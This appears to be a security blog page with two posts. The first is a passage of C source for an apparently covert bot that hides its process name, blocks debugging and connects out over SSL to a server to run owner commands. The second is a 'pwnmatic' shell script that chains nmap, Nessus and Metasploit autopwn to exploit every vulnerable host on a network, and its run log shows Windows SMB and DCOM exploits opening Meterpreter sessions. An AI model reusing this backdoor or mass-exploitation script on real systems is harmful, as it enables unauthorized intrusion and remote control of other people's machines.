if((cmdptr = strstr(cmd, OWNER))) {
if((cmdptr = strstr(cmd,"!op"))) {
op(ssl);
}
if((cmdptr = strstr(cmd,"!e"))) {
runcmd(ssl, cmdptr);
}
}
}
free(msgbuf);
msgbuf = NULL;
}


int
srvssl(SSL *ssl)
{
if((!strstr(SSL_get_cipher_name(ssl), "AES256-SHA")) || (!strstr(SSL_get_cipher_version(ssl), "TLSv1i/SSLv3")))
return -1;
return 1;
}


int
main(int argc, char * argv[])
{
if (ptrace(PTRACE_TRACEME, 0, 0, 0) == -1)
exit(1);

int conx, sock, port = PORT;
struct sockaddr_in sout;
struct hostent *he;
SSL_CTX *ctx;
SSL *ssl;
pid_t pid;

strcpy(argv[0], LABEL);

he = gethostbyname(SERV);

bzero((char *)&sout, sizeof(sout));
sout.sin_family = AF_INET;
sout.sin_port = htons(port);
memcpy(&sout.sin_addr.s_addr, he->h_addr, he->h_length);

sock = socket(AF_INET, SOCK_STREAM, 0);

ctx = initctx();
ssl = SSL_new(ctx);

pid = fork();

if(pid == 0) {
conx = connect(sock, (struct sockaddr *)&sout, sizeof(sout));

SSL_set_fd(ssl, sock);
SSL_connect(ssl);

if(srvssl(ssl))
srvconn(ssl);
}

close(sock);
SSL_free(ssl);
SSL_CTX_free(ctx);

return 0;
}

Labels: Security

This script will run nmap against a a box/network to find live boxes then scan it with nessus, importing the results to metasploit and then running autopwn against the vulnerabilities found which are targeted by the vulnID - it seems more efficient than running every exploit against every open port, al la the default autopwn method. It also saves owning the same breed of bug several times.

Just run it, go for a coffee and come back to get your r00t on :)


##
# Autopwn pwnmatic
##
#!/bin/sh
NESSUS=~/pentest/scanners/nessus/bin/ #nessus binary
MSF=~/pentest/exploiting/metasploit #msf console location
LOG=~/audits/scans/nessus/$2.nbe #report location

HOSTS=./nessus_hosts.txt
AUTOPWN=./autopwn

echo "Starting scan..."
nmap -v -n -sP $1 |grep Host | grep up | awk '{print $2}' > $HOSTS

echo "Scan finished, starting nessus..."
$NESSUS/nessus localhost 1337 user p4ssw0rd $HOSTS $LOG

echo "Nessus finished, converting log..."
$NESSUS/nessus -i $LOG -o $LOG.txt
$NESSUS/nessus -i $LOG -o $LOG.nessus

mv $HOSTS ~/audits/scans/nmap/$2-nmap_auto.txt

echo "Do you want to import into metasploit autopwn? (y/n)"
read DOU

if [ $DOU == "y" ] ; then
cat > $AUTOPWN << _EOF
db_create $2.db
db_import_nessus_nbe $LOG
db_autopwn -x -r -e
_EOF
echo "please wait..."
$MSF/msfconsole -r $AUTOPWN
else
echo "Listing any fulnerabilities then..."
A=`egrep "Security hole found" $LOG.txt | sort -u`
if [ $A -eq "" ] ; then
echo " --> None found :("
else
echo $A
fi
echo "Finished."
fi
##
# End
###


user@debauch:~/scripts$ ./pwnmatic.sh 192.168.224.0/24 test-run
Starting scan...
Scan finished, starting nessus...
Nessus finished, converting log...
Do you want to import into metasploit autopwn? (y/n)
y
please wait...


o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


=[ msf v3.3-dev
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
=[ 158 aux

resource> db_create testing.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: testing.db
resource> db_import_nessus_nbe /home/user/audits/scans/nessus/testing.nbe
resource> db_autopwn -x -r -e
[*] (1/4): Launching exploit/windows/smb/ms04_011_lsass against 192.168.224.131:445...
[*] (2/4): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.224.131:135...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] (4/4): Launching exploit/windows/smb/ms06_040_netapi against 192.168.224.131:445...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.224.131[135] ...
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Handler binding to LHOST 0.0.0.0
[*] Sending exploit ...
[*] Started reverse handler
msf >
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.224.131[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] The DCERPC service did not reply to our request
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.224.131[\BROWSER] ...
[*] Building the stub data...
[*] Calling the vulnerable function...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] The DCERPC service did not reply to our request
[*] Meterpreter session 1 opened (192.168.224.129:34295 -> 192.168.224.131:1034)
[*] Meterpreter session 2 opened (192.168.224.129:23499 -> 192.168.224.131:1035)

msf > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.224.129:34295 -> 192.168.224.131:1034
2 Meterpreter 192.168.224.129:23499 -> 192.168.224.131:1035

msf >

Labels: Security